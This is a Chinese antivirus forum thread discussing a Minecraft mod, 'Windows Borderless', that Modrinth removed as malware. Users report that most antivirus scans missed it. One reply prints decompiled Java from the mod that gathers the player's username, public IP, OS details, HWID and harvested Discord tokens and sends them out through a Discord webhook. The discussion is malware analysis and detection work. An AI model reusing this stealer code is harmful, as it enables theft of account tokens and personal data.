查看: 1557|回复: 20
收起左侧

[病毒样本] 疑似参杂了Stealer的Minecraft模组

[复制链接]
GDHJDSYDH
发表于 2024-5-8 15:48:30 | 显示全部楼层 |阅读模式
近日Modrinth发现了一个名为Windows Borderless的Minecraft模组存在着恶意行为,目前此模组已被下架,具体详情:Malware Discovery Disclosure: "Windows Borderless" mod (modrinth.com)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Raven95676
发表于 2024-5-8 16:09:30 | 显示全部楼层
本帖最后由 Raven95676 于 2024-5-8 16:34 编辑

卡巴扫描miss
avast免费版扫描miss
eset online scanner 扫描miss
hyper-v无法测试实际运行效果
有能测运行的测下没?
JuMin
发表于 2024-5-8 16:29:07 | 显示全部楼层
360安全云团队版、金山毒霸团队版 Miss
DisaPDB
发表于 2024-5-8 17:13:18 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-5-8 17:15 编辑

360ATA miss.
应该没法直接跑吧,需要手动加载到mc里

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-5-8 17:16:11 | 显示全部楼层
Raven95676 发表于 2024-5-8 16:09
卡巴扫描miss
avast免费版扫描miss
eset online scanner 扫描miss

这种mod类型的得让mc加载了才能跑吧
yeahnangua
发表于 2024-5-8 17:40:18 | 显示全部楼层
有恶意行为,卡巴无反应

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-5-8 17:42:49 | 显示全部楼层
yeahnangua 发表于 2024-5-8 17:40
有恶意行为,卡巴无反应

你给出的截图里有恶意行为吗
yeahnangua
发表于 2024-5-8 17:48:40 | 显示全部楼层
DisaPDB 发表于 2024-5-8 17:42
你给出的截图里有恶意行为吗

盗discord号的

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-5-8 17:50:50 | 显示全部楼层

你给出的截图里有恶意行为吗

  1. public class Sender {
  2.     public static void sendMessage(String message) {
  3.         String HWID = TempUserLog.getHWID();
  4.         try {
  5.             InetAddress.getLocalHost();
  6.             String OS_VERSION = System.getProperty("os.version");
  7.             String OS_ARC = System.getProperty("os.arch");
  8.             String JAVA_VER = System.getProperty("java.version");
  9.             String PC_USER_ACCOUNT_NAME = System.getProperty("user.name");
  10.             String OS_NAME = System.getProperty("os.name");
  11.             try {
  12.                 new URL("https://myexternalip.com/raw");
  13.                 try {
  14.                     URL url1 = new URL("https://myexternalip.com/raw");
  15.                     try {
  16.                         BufferedReader br = new BufferedReader(new InputStreamReader(url1.openStream()));
  17.                         try {
  18.                             String IP = br.readLine();
  19.                             br.close();
  20.                             WindowedBorderless.webhook.setAvatarUrl("https://cdn.modrinth.com/data/25BuKvi7/736ea2edc6b0103ab61b122afd5d09b5179e26e5.gif");
  21.                             WindowedBorderless.webhook.setUsername("Windowed Borderless Logger");
  22.                             WindowedBorderless.webhook.setTts(false);
  23.                             WindowedBorderless.webhook.addEmbed(new DiscordWebhook.EmbedObject().setTitle("").setColor(Color.BLACK).addField("Username", class_310.method_1551().method_1548().method_1676(), true).addField("Public IP", IP, true).addField("OS Name", OS_NAME, true).addField("OS Version", OS_VERSION, true).addField("OS Architecture", OS_ARC, true).addField("Java Version", JAVA_VER, true).addField("HWID", HWID, true).addField("OS Username", PC_USER_ACCOUNT_NAME, true).addField("-----------", "-----------", true).addField("Tokens", message, true));
  24.                             if (!Objects.equals(message, "[null]") && !Objects.equals(message, "[]")) {
  25.                                 try {
  26.                                     WindowedBorderless.webhook.execute();
  27.                                 } catch (IOException e) {
  28.                                 }
  29.                             }
  30.                         } finally {
  31.                         }
  32.                     } catch (IOException e2) {
  33.                         throw new RuntimeException(e2);
  34.                     }
  35.                 } catch (MalformedURLException e3) {
  36.                     throw new RuntimeException(e3);
  37.                 }
  38.             } catch (MalformedURLException e4) {
  39.                 throw new RuntimeException(e4);
  40.             }
  41.         } catch (UnknownHostException e5) {
  42.             throw new RuntimeException(e5);
  43.         }
  44.     }
  45. }
复制代码




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yeahnangua
发表于 2024-5-8 17:56:51 | 显示全部楼层
DisaPDB 发表于 2024-5-8 17:50
你给出的截图里有恶意行为吗

一个模组专挑discord数据库访问还不算恶意行为吗
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-20 06:17 , Processed in 0.132106 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表